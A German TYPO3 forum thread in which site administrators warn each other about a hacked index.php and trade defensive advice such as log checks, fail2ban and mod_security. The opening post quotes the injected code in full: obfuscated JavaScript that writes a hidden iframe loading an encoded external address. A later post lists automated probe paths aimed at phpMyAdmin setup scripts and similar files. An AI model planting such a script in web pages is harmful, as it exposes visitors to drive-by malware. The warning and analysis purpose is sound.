• Forum
• TYPO3 CMS: Installationsprobleme
• Sonstiges
• TYPO3 "index.php" gehackt

TYPO3 "index.php" gehackt

• pow
  Jedi-Ratsmitglied

  0 x

  719	Beiträge
  0	Hilfreiche Beiträge

  • Facebook
  • Twitter

  22. 03. 2012, 09:36

  Hallo T3'ler,

  heute musste ich mit erschrecken feststellen das meine Seite gehackt wurde.
  Zum glück nur minimal und ich konnte den "hack" gleich finden.

  In der index.php (root) war folgende Zeile:

  <script>var GlK = '06606503b06606506806606506506606507106606506006606506c06606506406606501f06606507206606507106606506206606503c06606502106606502106606501f06606507606606506806606506306606507306606506706606503c06606502106606503006606502106606501f06606506706606506406606506806606506606606506706606507306606503c06606502106606503006606502106606501f06606506806606506306606503c06606502106606507806606504006606506106606502106606501f06606506506606507106606506006606506c06606506406606506106606506e06606507106606506306606506406606507106606503c06606502106606502f06606502106606503d06606503b06606502e06606506806606506506606507106606506006606506c06606506406606503d';function tSc(uEZ,w1,w2){var gwl='';arr=uEZ.split('0'+w1+'0'+w2+'0');for(i=1; i<arr.length; i++){ gwl+='%'+(parseInt(arr[i], 16)+1).toString(16);}return gwl;} var MvX=unescape;document.write(MvX(tSc(GlK,'66','65')));document.getElementById('yAb').src = MvX(tSc('02f03906702f03907302f03907302f03906f02f03903902f03902e02f03902e02f03903002f03903302f03903502f03902d02f03903002f03903702f03903402f03902d02f03903102f03903302f03903802f03902d02f03903002f03903502f03903802f03902e02f03907202f03907502f03902e02f03906202f03906e02f03907402f03906d02f03907302f03902d02f03906f02f03906702f03906f02f03903e02f03906002f03906302f03906302f03903c02f039030','2f','39'));</script>

  Alles ist auf CHMOD 644?
  Konnte dies evtl. durch eine Alpha/Beta Extension zustandekommen?

  Was das Script macht, ist einen iFrame am Ende der Webseite zu platzieren. Man bemerkt es spätestens wenn man seine Seite/ sein Projekt besucht und eine Viruswarnung auftaucht.

  Dies ist weniger eine Frage, sondern eine Warnung, damit alle Ihre index.php prüfen.

  Grüße

• 1

• LuP
  Jedi-Meister

  0 x

  496	Beiträge
  1	Hilfreiche Beiträge

  • Facebook
  • Twitter

  22. 03. 2012, 11:10

  Hallo pow,

  Hast Du alle Logs geprüft? FTP, Apache? Wichtig ist es zu wissen,
  wann die Änderung stattgefunden hat und wie sie zustande kam.
  Infizierter PC und gehackter FTP Account wären nicht auszuschließen.
  Suspekte/verwundbare Erweiterungen direkt an das Security-Team melden.
  Auch solltest Du künftig Integritätsprüfungen und Intrusion detection in Erwägung ziehen.

  VG,
  LuP

• igorshmig...
  Jedi-Ratsmitglied

  0 x

  941	Beiträge
  0	Hilfreiche Beiträge

  • Facebook
  • Twitter

  22. 03. 2012, 11:15

  Übel, gerade vor kurzem war hier schon ein Beitrag über eine gehackte TYPO3-Seite und bei einem meiner Kunden wurde auch ein Versuch gestartet. Was geht denn ab zur Zeit?
  Danke für die Warnung.

• Chrissli
  Jedi-General

  0 x

  1016	Beiträge
  28	Hilfreiche Beiträge

  • Facebook
  • Twitter

  22. 03. 2012, 20:34

  Kurze Frage:

  du verwendest die aktuelle Version? Oder wurde evtl. "nur" eine schon bekannte Lücke in einer älteren Version ausgenutzt??

  God's in his heaven, all's right with the world

• homy
  Padawan

  0 x

  52	Beiträge
  1	Hilfreiche Beiträge

  • Facebook
  • Twitter

  24. 03. 2012, 16:41

  Was nutzt ihr für Formulare? Evtl. ist hier die Lücke.

• skydivema...
  Jedi-Meister

  0 x

  276	Beiträge
  1	Hilfreiche Beiträge

  • Facebook
  • Twitter

  25. 03. 2012, 16:53

  Da es ums Hacken geht möcht ich Euch mal mein Realurl Errorlog von einer Zeitspanne von 4 wochen Zeigen. Alles Einträge mit Dubiosen Web Anfragen einer Webseite eines Bekannten die ich Pflege.
  

  de/kontakt/gb.php
  scripts/setup.php
  admin/scripts/setup.php
  admin/pma/scripts/setup.php
  admin/phpmyadmin/scripts/setup.php
  db/scripts/setup.php
  dbadmin/scripts/setup.php
  myadmin/scripts/setup.php
  mysql/scripts/setup.php
  mysqladmin/scripts/setup.php
  phpadmin/scripts/setup.php
  phpMyAdmin/scripts/setup.php
  phpmyadmin/scripts/setup.php
  phpmyadmin1/scripts/setup.php
  phpmyadmin2/scripts/setup.php
  pma/scripts/setup.php
  web/phpMyAdmin/scripts/setup.php
  xampp/phpmyadmin/scripts/setup.php
  web/scripts/setup.php
  php-my-admin/scripts/setup.php
  websql/scripts/setup.php
  phpMyAdmin-2/scripts/setup.php
  phpMyAdmin-2.2.3/scripts/setup.php
  phpMyAdmin-2.2.6/scripts/setup.php
  phpMyAdmin-2.5.1/scripts/setup.php
  phpMyAdmin-2.5.4/scripts/setup.php
  phpMyAdmin-2.5.5-rc1/scripts/setup.php
  phpMyAdmin-2.5.5-rc2/scripts/setup.php
  phpMyAdmin-2.5.5/scripts/setup.php
  phpMyAdmin-2.5.5-pl1/scripts/setup.php
  phpMyAdmin-2.5.6-rc1/scripts/setup.php
  phpMyAdmin-2.5.6-rc2/scripts/setup.php
  phpMyAdmin-2.5.6/scripts/setup.php
  phpMyAdmin-2.5.7/scripts/setup.php
  phpMyAdmin-2.5.7-pl1/scripts/setup.php
  phpMyAdmin-2.6.0-alpha/scripts/setup.php
  phpMyAdmin-2.6.0-alpha2/scripts/setup.php
  phpMyAdmin-2.6.0-beta1/scripts/setup.php
  phpMyAdmin-2.6.0-beta2/scripts/setup.php
  phpMyAdmin-2.6.0-rc1/scripts/setup.php
  phpMyAdmin-2.6.0-rc2/scripts/setup.php
  phpMyAdmin-2.6.0-rc3/scripts/setup.php
  phpMyAdmin-2.6.0/scripts/setup.php
  phpMyAdmin-2.6.0-pl1/scripts/setup.php
  phpMyAdmin-2.6.0-pl2/scripts/setup.php
  phpMyAdmin-2.6.0-pl3/scripts/setup.php
  phpMyAdmin-2.6.1-rc1/scripts/setup.php
  phpMyAdmin-2.6.1-rc2/scripts/setup.php
  phpMyAdmin-2.6.1/scripts/setup.php
  phpMyAdmin-2.6.1-pl1/scripts/setup.php
  phpMyAdmin-2.6.1-pl2/scripts/setup.php
  phpMyAdmin-2.6.1-pl3/scripts/setup.php
  phpMyAdmin-2.6.2-rc1/scripts/setup.php
  phpMyAdmin-2.6.2-beta1/scripts/setup.php
  phpMyAdmin-2.6.2/scripts/setup.php
  phpMyAdmin-2.6.2-pl1/scripts/setup.php
  phpMyAdmin-2.6.3/scripts/setup.php
  phpMyAdmin-2.6.3-rc1/scripts/setup.php
  phpMyAdmin-2.6.3-pl1/scripts/setup.php
  phpMyAdmin-2.6.4-rc1/scripts/setup.php
  phpMyAdmin-2.6.4-pl1/scripts/setup.php
  phpMyAdmin-2.6.4-pl2/scripts/setup.php
  phpMyAdmin-2.6.4-pl3/scripts/setup.php
  phpMyAdmin-2.6.4-pl4/scripts/setup.php
  phpMyAdmin-2.6.4/scripts/setup.php
  phpMyAdmin-2.7.0-beta1/scripts/setup.php
  phpMyAdmin-2.7.0-rc1/scripts/setup.php
  phpMyAdmin-2.7.0-pl1/scripts/setup.php
  phpMyAdmin-2.7.0-pl2/scripts/setup.php
  phpMyAdmin-2.7.0/scripts/setup.php
  phpMyAdmin-2.8.0-beta1/scripts/setup.php
  phpMyAdmin-2.8.0-rc1/scripts/setup.php
  phpMyAdmin-2.8.0-rc2/scripts/setup.php
  phpMyAdmin-2.8.0/scripts/setup.php
  phpMyAdmin-2.8.0.1/scripts/setup.php
  phpMyAdmin-2.8.0.2/scripts/setup.php
  phpMyAdmin-2.8.0.3/scripts/setup.php
  phpMyAdmin-2.8.0.4/scripts/setup.php
  phpMyAdmin-2.8.1-rc1/scripts/setup.php
  phpMyAdmin-2.8.1/scripts/setup.php
  phpMyAdmin-2.8.2/scripts/setup.php
  sqlmanager/scripts/setup.php
  mysqlmanager/scripts/setup.php
  p/m/a/scripts/setup.php
  PMA2005/scripts/setup.php
  pma2005/scripts/setup.php
  phpmanager/scripts/setup.php
  php-myadmin/scripts/setup.php
  phpmy-admin/scripts/setup.php
  webadmin/scripts/setup.php
  sqlweb/scripts/setup.php
  webdb/scripts/setup.php
  mysql-admin/scripts/setup.php
  databaseadmin/scripts/setup.php
  admm/scripts/setup.php
  admn/scripts/setup.php
  index.php
  admin/index.php
  admin/pma/index.php
  admin/phpmyadmin/index.php
  db/index.php
  dbadmin/index.php
  myadmin/index.php
  mysqladmin/index.php
  phpadmin/index.php
  phpMyAdmin/index.php
  phpmyadmin/index.php
  phpmyadmin1/index.php
  phpmyadmin2/index.php
  pma/index.php
  web/phpMyAdmin/index.php
  xampp/phpmyadmin/index.php
  web/index.php
  php-my-admin/index.php
  websql/index.php
  phpMyAdmin-2/index.php
  phpMyAdmin-2.2.3/index.php
  phpMyAdmin-2.2.6/index.php
  phpMyAdmin-2.5.1/index.php
  phpMyAdmin-2.5.4/index.php
  phpMyAdmin-2.5.5-rc1/index.php
  phpMyAdmin-2.5.5-rc2/index.php
  phpMyAdmin-2.5.5/index.php
  phpMyAdmin-2.5.5-pl1/index.php
  phpMyAdmin-2.5.6-rc1/index.php
  phpMyAdmin-2.5.6-rc2/index.php
  phpMyAdmin-2.5.6/index.php
  phpMyAdmin-2.5.7/index.php
  phpMyAdmin-2.5.7-pl1/index.php
  photo-gallery/www.calypsodivecenter.com
  FCKeditor/editor//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
  admin/fckeditor/editor//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
  admin/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
  ajaxfilemanager/jscripts/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
  faq/admin/editor//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
  fckeditor/editor//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
  gallery/zp-core/zp-extensions/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
  includes/fckeditor/editor//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
  includes/tinymce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
  javascript/tinymce/jscripts/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
  js/jscripts/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
  js/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
  jscripts/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
  main/inc/lib/fckeditor/editor//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
  photo/zp-core/zp-extensions/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
  scripts/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
  shop/admin/includes/javascript/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
  tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
  zen/zp-core/zp-extensions/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
  zenphoto/zp-core/zp-extensions/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
  /themes/Calypso/Calypso/timthumb.php
  /kontakt//wp-content/themes/Calypso/timthumb.php
  /themes/Calypso/timthumb.php
  /sitemap//wp-content/themes/Calypso/timthumb.php
  register-user/index.php
  wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php
  wp-content/plugins/wp-phpmyadmin/phpmyadmin/index.php
  PMA/index.php
  mysql/index.php
  sqlmanager/index.php
  mysqlmanager/index.php
  phpmanager/index.php
  webadmin/index.php
  sqlweb/index.php
  webdb/index.php
  mysql-admin/index.php
  php-myadmin/index.php
  phpmy-admin/index.php

  Ich weiss nicht wieviele Deny from ich schon in der .htaccess habe, aber nachdem ich aus einer Liste mit Blacklistet Hacker und Spammer Ip's noch zusätzlich in die .htaccess eingetragen hatte sind solche Webanfragen seit etwa 3 Wochen ausgeblieben.
  Aber es Stimmt schon das es in der Letzten Zeit erheblich zugenommen hat.

  Dass ist sehr Interessant. Wers noch nicht kennt. http://www.illutzmination.de/security.html

  gruss
  maty

  Maty

• skydivema...
  Jedi-Meister

  0 x

  276	Beiträge
  1	Hilfreiche Beiträge

  • Facebook
  • Twitter

  25. 03. 2012, 16:55

  Sorry Vergessen. Die Meisten von Diesen Anfragen kommen aus der Ukraine, Russland, China.

  Maty

• Chrissli
  Jedi-General

  0 x

  1016	Beiträge
  28	Hilfreiche Beiträge

  • Facebook
  • Twitter

  26. 03. 2012, 00:32

  Sorry wenn ich das sage, aber das Scannen von offenen Serverports,
  versuchte SSH-Logins mit 08/15-Credentials oder das Aufrufen
  von evtl. existierenden Dateien ( seien es PhpMyAdmin, setup-Scripte o.ä. )
  ist nichts besonders auffälliges und tritt auch nicht erst seit kurzem auf.

  Ich betreue schon seit mehreren Jahren den Server eines Kunden und da nehmen solche
  traurigen Versuche etwa 80-90% des Logs ein. Und das da die östlich gelegenen Länder
  weit vorne mit dabei sind ist auch ein alter Hut.

  Alles in allem hat das aber mit dem eigentlichen Problem nichts zu tun, da immer noch
  nicht klar ist, ob es sich um eine Lücke in einer aktuellen Typo-Version handelt oder
  "nur" der PC / FTP-Zugang korrupt war oder eine andere, nicht Typo-relevante, Lücke ausgenutzt wurde.

  God's in his heaven, all's right with the world

• LutzOMat
  TYPO3-Anwärter

  0 x

  7	Beiträge
  0	Hilfreiche Beiträge

  • Facebook
  • Twitter

  26. 03. 2012, 21:58

  Hallo Chrissli,

  natürlich hast Du Recht, dass die klassischen Scans nichts ungewöhnliches sind. Wenn man kein ungeschütztes phpMyAdmin auf dem Server hat und auch sonst nichts "kritisches" kann man das alles ignorieren.

  Meine Taktik ist es jedoch, bei jeder auftretenden Ungereimtheit den Besucher rigoros auszusperren. Auch derjenige, der nicht total planlos vorgeht, sondern es speziell auf Typo3 abgesehen hat, erzeugt ein paar Fehler, die es ermöglichen, sein Vorhaben mit [b]fail2ban[/b] oder [b]mod_security[/b] zu erkennen und unterbinden.

  So wird zum Beispiel im noch gerade halbwegs aktuellen Security Beitrag
  [url=]typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2011-004/[/url]
  als Lösung eine mod_Security Regel angegeben.

  Ich würde den Einsatz von fail2ban / mod_security daher jedem Server-Admin sehr ans Herz legen.

  [quote="Chrissli"]
  Sorry wenn ich das sage, aber das Scannen von offenen Serverports,
  versuchte SSH-Logins mit 08/15-Credentials oder das Aufrufen
  von evtl. existierenden Dateien ( seien es PhpMyAdmin, setup-Scripte o.ä. )
  ist nichts besonders auffälliges und tritt auch nicht erst seit kurzem auf.

  Ich betreue schon seit mehreren Jahren den Server eines Kunden und da nehmen solche
  traurigen Versuche etwa 80-90% des Logs ein. Und das da die östlich gelegenen Länder
  weit vorne mit dabei sind ist auch ein alter Hut.

  Alles in allem hat das aber mit dem eigentlichen Problem nichts zu tun, da immer noch
  nicht klar ist, ob es sich um eine Lücke in einer aktuellen Typo-Version handelt oder
  "nur" der PC / FTP-Zugang korrupt war oder eine andere, nicht Typo-relevante, Lücke ausgenutzt wurde.
  [/quote]

• 1

• Zurück